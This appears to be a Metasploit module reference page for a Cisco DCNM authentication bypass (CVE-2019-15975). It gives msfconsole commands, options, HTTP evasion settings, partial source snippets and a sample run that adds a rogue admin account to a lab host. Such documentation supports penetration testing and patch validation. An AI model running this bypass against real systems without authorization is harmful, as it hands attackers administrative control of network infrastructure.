Cisco DCNM auth bypass - Metasploit
This page contains detailed information about how to use the auxiliary/admin/networking/cisco_dcnm_auth_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco DCNM auth bypass
Module: auxiliary/admin/networking/cisco_dcnm_auth_bypass
Source code: modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb
Disclosure date: 2020-06-01
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-15975
This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose. After that, you can login to the web interface with those credentials. The only necessary condition is the more or less recent connection of an admin as this exploit uses a kind of session stealing.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use auxiliary/admin/networking/cisco_dcnm_auth_bypass
msf auxiliary(cisco_dcnm_auth_bypass) > show targets
... a list of targets ...
msf auxiliary(cisco_dcnm_auth_bypass) > set TARGET target-id
msf auxiliary(cisco_dcnm_auth_bypass) > show options
... show and set options ...
msf auxiliary(cisco_dcnm_auth_bypass) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Description
This module exploits CVE-2019-15975 which affects Cisco DCNM versions 11.2 up to but not including 11.3(1). This exploit adds an admin account with any credentials you want. Then you can login to the web interface of Cisco DCNM with those credentials. The only necessary condition is the more or less recent connection (probably something like within the last hours) of an admin as this exploit uses a kind of session stealing.
Installation
A vulnerable version of Cisco DCNM can be downloaded from here. Then follow all the steps in the installation interface. You might have to set up a database if the auto installation of PostgreSQL fails for instance (that was my case and I finally had to manually install PostgreSQL).
Verification Steps
List the steps needed to make sure this thing works
- Start
msfconsole
use auxiliary/admin/networking/cisco_dcnm_auth_bypass
set RHOST <target_host>
check
to check if the targeted Cisco DCNM is vulnerableset USERNAME <username>
andset PASSWORD <password>
to specify the credentials you want to addrun
the module to exploit the CVE and add an admin account with those credentials
Options
RHOSTS
Set the target host.
USERNAME
Set the USERNAME of the admin account you want to add.
PASSWORD
Set the PASSWORD of the admin account you want to add.
RETRIES
You can change the maximum number of attempts to add an admin account by using set RETRIES <max_retries>
.
Scenarios
DCNM 11.2(1) - Linux OVA Appliance
msf6 > use auxiliary/admin/networking/cisco_dcnm_auth_bypass
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > set RHOST 192.168.159.33
RHOST => 192.168.159.33
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > check
[+] 192.168.159.33:443 - The target is vulnerable.
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > run
[*] Running module against 192.168.159.33
[+] Admin account with username: 'frederick' and password: '1OwNqJnO' added!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) >
Go back to menu.
Msfconsole Usage
Here is how the admin/networking/cisco_dcnm_auth_bypass auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/networking/cisco_dcnm_auth_bypass
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show info
Name: Cisco DCNM auth bypass
Module: auxiliary/admin/networking/cisco_dcnm_auth_bypass
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-06-01
Provided by:
MR_ME
Yann Castel (yann.castel <Yann Castel ([email protected])>
Module side effects:
ioc-in-logs
config-changes
Module stability:
crash-safe
Module reliability:
repeatable-session
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD Su8DpCqE yes The password of the admin account you want to add
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETRIES 50 yes Retry count for the attack
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path of the Cisco DCNM
USERNAME sylvester yes The username of the admin account you want to add
VHOST no HTTP server virtual host
Description:
This exploit is able to add an admin account to a Cisco DCNM with
credentials you can choose. After that, you can login to the web
interface with those credentials. The only necessary condition is
the more or less recent connection of an admin as this exploit uses
a kind of session stealing.
References:
https://nvd.nist.gov/vuln/detail/CVE-2019-15975
https://www.exploit-db.com/exploits/48018
Module Options
This is a complete list of options available in the admin/networking/cisco_dcnm_auth_bypass auxiliary module:
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show options
Module options (auxiliary/admin/networking/cisco_dcnm_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD Su8DpCqE yes The password of the admin account you want to add
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETRIES 50 yes Retry count for the attack
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path of the Cisco DCNM
USERNAME sylvester yes The username of the admin account you want to add
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the admin/networking/cisco_dcnm_auth_bypass auxiliary module:
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show advanced
Module advanced options (auxiliary/admin/networking/cisco_dcnm_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/networking/cisco_dcnm_auth_bypass module can do:
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/networking/cisco_dcnm_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target <RHOST> could not be reached.
Here is a relevant code snippet related to the "Target <RHOST> could not be reached." error message:
119: r = send_request_cgi({
120: 'method' => 'GET',
121: 'uri' => normalize_uri(target_uri.path)
122: })
123:
124: fail_with(Failure::Unreachable, "Target #{rhost} could not be reached.") unless r
125:
126: r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')
127: r_time
128: end
129:
Didn't succeed after <RETRIES> attempts
Here is a relevant code snippet related to the "Didn't succeed after <RETRIES> attempts" error message:
139: if res != :fail && res != :failed_to_connect
140:
141: return res
142: end
143: end
144: print_error("Didn't succeed after #{datastore['RETRIES']} attempts")
145: res
146: end
147:
148: def check
149: res = add_admin_account('test', 'test')
Unable to add admin account due to bad password strength
Here is a relevant code snippet related to the "Unable to add admin account due to bad password strength" error message:
160: def run
161: res = add_admin_account(datastore['USERNAME'], datastore['PASSWORD'])
162: if res == :success
163: print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
164: elsif res == :weak_password
165: print_error('Unable to add admin account due to bad password strength')
166: elsif res == :user_already_exists
167: print_error('Unable to add admin account because this username already exists')
168: else
169: print_error('Something went wrong')
170: end
Unable to add admin account because this username already exists
Here is a relevant code snippet related to the "Unable to add admin account because this username already exists" error message:
162: if res == :success
163: print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
164: elsif res == :weak_password
165: print_error('Unable to add admin account due to bad password strength')
166: elsif res == :user_already_exists
167: print_error('Unable to add admin account because this username already exists')
168: else
169: print_error('Something went wrong')
170: end
171: end
172: end
Something went wrong
Here is a relevant code snippet related to the "Something went wrong" error message:
162: if res == :success
163: print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")
164: elsif res == :weak_password
165: print_error('Unable to add admin account due to bad password strength')
166: elsif res == :user_already_exists
167: print_error('Unable to add admin account because this username already exists')
168: else
169: print_error('Something went wrong')
170: end
171: end
172: end
Go back to menu.
Related Pull Requests
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/networking/cisco_asa_extrabacon
- auxiliary/admin/networking/cisco_config
- auxiliary/admin/networking/cisco_dcnm_download
- auxiliary/admin/networking/cisco_secure_acs_bypass
- auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
- auxiliary/admin/http/cisco_7937g_ssh_privesc
- auxiliary/admin/networking/arista_config
- auxiliary/admin/networking/brocade_config
- auxiliary/admin/networking/f5_config
- auxiliary/admin/networking/juniper_config
- auxiliary/admin/networking/mikrotik_config
- auxiliary/admin/networking/ubiquiti_config
- auxiliary/admin/networking/vyos_config
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/gather/cisco_pvc2300_download_config
- auxiliary/gather/cisco_rv320_config
- auxiliary/scanner/http/cisco_asa_asdm
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/cisco_asa_clientless_vpn
- auxiliary/scanner/http/cisco_device_manager
- auxiliary/scanner/http/cisco_directory_traversal
- auxiliary/scanner/http/cisco_firepower_download
- auxiliary/scanner/http/cisco_firepower_login
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/cisco_ironport_enum
- auxiliary/scanner/http/cisco_nac_manager_traversal
- auxiliary/scanner/http/cisco_ssl_vpn
- auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
- auxiliary/scanner/ike/cisco_ike_benigncertain
- auxiliary/scanner/misc/cisco_smart_install
- auxiliary/scanner/snmp/cisco_config_tftp
- auxiliary/scanner/snmp/cisco_upload_file
- auxiliary/voip/cisco_cucdm_call_forward
- auxiliary/voip/cisco_cucdm_speed_dials
Authors
- MR_ME
- Yann Castel (yann.castel[at]orange.com)
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.